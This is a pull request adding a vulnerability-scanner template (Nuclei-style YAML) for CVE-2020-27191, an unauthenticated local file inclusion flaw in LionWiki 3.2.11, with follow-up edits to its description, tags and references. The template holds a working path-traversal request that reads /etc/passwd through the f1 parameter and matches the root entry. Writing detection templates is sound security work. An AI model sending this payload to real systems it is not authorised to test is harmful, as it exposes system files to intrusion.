### PR TITLE
Create CVE-2020-27191.yaml

### DIFF
--- a/CVE-2020-27191.yaml
+++ b/CVE-2020-27191.yaml
@@ -1,0 +1,31 @@
+id: CVE-2020-27191
+info:
+  name: LionWiki 3.2.11 - LFI
+  author: 0x_Akoko
+  severity: high
+  description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+  reference:
+    - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
+    - https://www.cvedetails.com/cve/CVE-2020-27191
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2020-27191
+    cwe-id: CWE-22
+  tags: cve,cve2020,lionwiki,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

--- a/CVE-2020-27191.yaml
+++ b/CVE-2020-27191.yaml
@@ -3,7 +3,7 @@ info:
   name: LionWiki 3.2.11 - LFI
   author: 0x_Akoko
   severity: high
-  description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
+  description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion.
   reference:
     - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
     - https://www.cvedetails.com/cve/CVE-2020-27191
@@ -12,7 +12,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2020-27191
     cwe-id: CWE-22
-  tags: cve,cve2020,lionwiki,lfi
+  tags: cve,cve2020,lionwiki,lfi,oss
 
 requests:
   - method: GET
@@ -21,10 +21,9 @@ requests:
 
     matchers-condition: and
     matchers:
-
       - type: regex
         regex:
-          - "root:[x*]:0:0"
+          - "root:[x*]:0:0:"
 
       - type: status
         status:

--- a/cves/2020/CVE-2020-27191.yaml
+++ b/cves/2020/CVE-2020-27191.yaml
@@ -6,6 +6,7 @@ info:
   description: LionWiki before 3.2.12 allows an unauthenticated user to read files as the web server user via crafted string in the index.php f1 variable, aka Local File Inclusion.
   reference:
     - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
+    - http://lionwiki.0o.cz/index.php?page=Main+page
     - https://www.cvedetails.com/cve/CVE-2020-27191
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N


### PR DESCRIPTION
### Template / PR Information

### CVE-2020-27191 LIONWIKI 3.2.11 LFI

Vendor : http://lionwiki.0o.cz/index.php?page=Main+page
Product Owner: Lionwiki
Application Name: Lionwiki 3.2.11
CVE ID: CVE-2020-27191
Severity: Moderate
**Authentication: Not Required**
- Reference:
    - https://www.junebug.site/blog/cve-2020-27191-lionwiki-3-2-11-lfi
    - https://www.cvedetails.com/cve/CVE-2020-27191

### Template Validation

I've validated this template locally?
- YES